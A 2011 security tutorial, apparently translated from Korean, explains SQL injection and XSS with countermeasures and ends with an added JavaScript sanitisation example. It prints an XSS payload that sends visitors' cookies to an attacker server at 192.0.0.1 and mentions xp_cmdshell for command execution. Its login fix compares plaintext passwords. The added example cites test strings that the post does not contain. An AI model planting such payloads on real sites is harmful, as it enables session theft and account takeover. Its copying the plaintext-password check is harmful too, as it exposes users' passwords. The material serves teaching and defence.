SQL Injection Attacks - XSS Attacksopenkrhttps://youngsam.net/entry/SQL-%EC%82%BD%EC%9E%85-%EA%B3%B5%EA%B2%A9-XSS%EA%B3%B5%EA%B2%A92011-09-14T01:33:34+09:002011-09-14T01:33:34+09:00<p>1. SQL injection attacks</p><p> 1-1) In a web application, the parts that take user input into SQL statements, that is, the parts that must work with the database, can be broadly divided into login, search, and bulletin boards.</p><p> 1-2) During login, a crafted SQL statement is inserted into the ID and password fields and sent to the database as is, so the attacker can see the result they want.</p><p> 1-3) Advanced SQL attacks</p><p> Attacks that go beyond a simple login bypass and read the contents of other tables.</p><p> Typically, a postal-code search feature takes input into an SQL query for the lookup, and if user input is not checked during the lookup, the SQL injection vulnerability may allow the contents of other tables to be read. The Union clause is also sometimes used.</p><p> 1-4) The following conditions must be met for an advanced SQL injection attack.</p><p> The number of columns returned by the first select statement must equal the number of columns returned by the select statement after union, the table and column names must be known, and the type of each column must match.</p><p> 1-5) How to check whether an SQL injection vulnerability exists</p><p> 1. If entering a character such as ' where user input is connected to the DB causes an SQL error, an SQL injection vulnerability is considered to exist.</p><p> 2. Use of stacked SQL commands: in MS-SQL, when a ; character is present, the SQL query is terminated and the SQL query that follows the ; is executed.</p><p> 3. In MS-SQL, xp_cmdshell can be used to execute Windows built-in commands.</p><p> 1-6) Countermeasures</p><p> <font color="#ff0000">1. SQL injection vulnerabilities arise when the programmer fails to handle abnormal or unexpected input in the parts that accept user input.</font></p><p><font color="#ff0000"> 2. To prevent SQL injection attacks, filter the values entered by the user.</font></p><p><font color="#ff0000"> 3. 
Perform the validation in server-side script (SSS), not in the client-side script (CSS) language.</font></p><p>Solution)</p><p> String param1 = request.getParameter("id");</p><p> String param2 = request.getParameter("password");</p><p><font color="#ff0000"> validata(param1); // filter special characters</font></p><p><font color="#ff0000"> validata(param2);</font> </p><p> query = "select userid, userpw from users where userid =? ";</p><p> pstmt = conn.prepareStatement(query);</p><p> pstmt.setString(1, param1); // bind the user ID as a parameter instead of concatenating it into the query</p><p> rs = pstmt.executeQuery();</p><p> if (rs.next()) {</p><p> // verification </p><p> if (<font color="#ff0000">rs.getString(1).equals(param1) && rs.getString(2).equals(param2)) </font>{</p><p> // success</p><p> } else {</p><p> // failure</p><p> }</p><p> } else {</p><p> // login failed</p><p> }</p><p>2. XSS attacks</p><p> 2-1) Basic principle of attacks using XSS</p><p> <div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/attach/1/1164614176.jpg" alt="User-inserted image" height="386" width="550" /></div> </p><p> 2-2) What is XSS</p><p> 1. Cross Site Scripting is abbreviated as CSS. Because this is confused with another name, Cascading Style Sheets, it came to be generally called XSS.</p><p> 2. XSS is an attack technique used to extract other users' information. It is a vulnerability in which script code is not filtered in bulletin boards, search, that is, in the parts that accept user input, so that an attacker is able to execute script code.</p><p> 2-3) Attack methods using XSS</p><p> The process of logging in as another user by using that user's cookie value obtained through an actual XSS attack</p><p> 1. A particular script is written on the bulletin board and an unspecified number of people are induced to view it.</p><p> 2. The script runs and intercepts the viewer's cookie value.</p><p> 3. The intercepted cookie value is resent using a web proxy or similar.</p><p> 4. The attacker logs in with the viewer's information.</p><p> e.g.) <script> url="http://192.0.0.1/GetCookie.jsp?cookie=+document.cookie;whidow.open(</p><p> url,width=0, height=0);</script></p><p> The code above sends the user's cookie information to the attacker's web server when the board is viewed.</p><p><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/attach/1/1229687238.jpg" alt="User-inserted image" height="91" width="550" /></div></p><p> 2-4) Countermeasures</p><p> 1. Sensitive information must not be stored in cookies, and things such as user identification must not be put in cookies.</p><p> 2. The special characters used in script code must be understood and filtered accurately. 
<br>The most effective method is to define the characters users are allowed to enter (for example, letters, digits, and a few special characters) and filter out anything outside that set. This method has the advantage of blocking from the outset the special characters used in further XSS vulnerabilities.</p><p> 3. Unless it is absolutely necessary, configure bulletin boards so that HTML-format input cannot be used.</p><p> 4. Script replacement and neutralization: another method is to unconditionally replace any incoming string javascript with something like 'x-javascript' to neutralize script execution.</p><p> 5. Check for vulnerabilities regularly through periodic inspections and remove them. </p>
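<p>An added example, not part of the original post: the allowlist check from countermeasure 2 combined with HTML output encoding, run over test strings quoted in the posts above and compared with the keyword replacement from countermeasure 4. The function names, the allowlist policy and the sample list are assumptions made for this illustration.</p>

```javascript
// Added example; function names and the allowlist policy are assumptions.

// Countermeasure 2: accept only an allowlist of characters (assumed policy:
// letters including Hangul, digits, space and a few punctuation marks).
const ALLOWED = /^[\p{L}\p{N} .,!?_-]{1,200}$/u;
function isAllowedInput(text) {
  return typeof text === "string" && ALLOWED.test(text);
}

// Output encoding for HTML text nodes and quoted attribute values.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function encodeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Countermeasure 4 as described in the post: keyword replacement only.
function replaceKeyword(text) {
  return String(text).replace(/javascript/gi, "x-javascript");
}

// Board rendering: the title must pass the allowlist; the body is free text
// and is always encoded at output time.
function renderPost(title, body) {
  if (!isAllowedInput(title)) return { ok: false, html: "" };
  return { ok: true, html: `<h2>${encodeHtml(title)}</h2><p>${encodeHtml(body)}</p>` };
}

// Constructed samples: two test strings quoted in the posts plus benign text.
const SAMPLES = [
  '<script>alert("XSS")</script>',
  "<script>alert(String.fromCharCode(116, 101, 115, 116))</script>",
  "안녕하세요, 질문 있습니다!",
];

function report() {
  return SAMPLES.map((input) => {
    const encoded = encodeHtml(input);
    return {
      input,
      allowed: isAllowedInput(input),
      keywordFilterChanged: replaceKeyword(input) !== input,
      encoded,
      inert: !encoded.includes("<"), // no tag opener survives encoding
    };
  });
}

for (const row of report()) console.log(JSON.stringify(row));
```

<p>The keyword replacement leaves both script samples unchanged, while the allowlist rejects them and output encoding renders them as inert text.</p>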